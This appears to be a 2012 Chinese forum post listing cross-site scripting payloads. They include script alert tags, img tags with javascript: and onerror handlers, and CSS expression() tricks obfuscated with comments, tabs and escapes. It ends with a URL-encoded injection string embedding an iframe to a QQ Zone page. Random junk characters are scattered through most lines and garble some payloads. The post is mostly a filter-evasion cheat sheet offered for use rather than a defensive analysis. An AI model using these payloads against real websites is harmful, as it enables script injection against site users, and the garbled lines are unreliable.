<script>alert("跨站")</script> (最常用)+ Z' a- ~4 X; j# p |1 @0 X
<img scr=javascript:alert("跨站")></img>" m% D+ T2 E4 [4 g" m
<img scr="javascript: alert(/跨站/)></img>
' Y: u2 A# l, {; H<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)4 ] U- T5 A6 `; c* |
<img scr="#" onerror=alert(/跨站/)></img>
& @) j$ `5 W- l% y+ L3 [' l<img scr="#" style="xss:expression(alert(/xss/));"></img>) X) Z; H4 b, c- s
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
% F8 u8 Z" o9 f<img src=vbscript:msgbox ("xss")></img>
j X5 C9 x, \* H3 B& H2 s( k( f<style> input {left:expression (alert('xss'))}</style>; J$ ?" B8 |' v5 a
<div style={left:expression (alert('xss'))}></div>
4 d8 K, K3 }5 M, j5 n<div style={left:exp/* */ression (alert('xss'))}></div>. g0 y" d' G2 ~
<div style={left:\0065\0078ression (alert('xss'))}></div>' T$ L2 c# ~0 |& G. H/ N
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div> z* n/ b# \0 e
unicode <div style="{left:expRessioN (alert('xss'))}">
( b1 [3 c$ f. l! I+ e, U# G: y& a9 Z( C! ^6 ?! s, H. [& `2 N' V
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["; [$ C% g& K I( p) w. u
|
发表于 2012-9-13 17:15:04
收藏
支持
反对